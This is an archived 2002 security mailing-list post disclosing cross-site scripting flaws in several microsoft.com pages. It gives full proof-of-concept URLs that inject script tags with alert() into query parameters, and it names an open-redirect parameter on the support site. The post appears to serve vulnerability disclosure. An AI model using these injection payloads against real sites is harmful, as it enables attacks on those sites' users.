OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: frog frog (leseulfroghotmail.com)
Date: Wed Jan 09 2002 - 08:30:07 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ('binary' encoding is not supported, stored as-is) I've already send this bug :

    http://www.microsoft.com/freedomtoinnovate/inc/send
    friend.asp?sAddress="><script>alert('Microsoft%
    20hole')</script><"by%20frog-mn

    There is 2 others cross scriptings bugs :

    http://www.microsoft.com/jobs/search/processCriteri
    a.asp?msid1=1047112&msid2=-
    613922157&msid3=<script>alert('test')
    </script>&msid4=451143745

    and in
    http://www.microsoft.com/jobs/search/keywords.asp .

    There is a bad redirect script too :

    http://support.microsoft.com/default.aspx?
    scid=http://where.to.go

    Crosoft has been alerted...

    frog-mn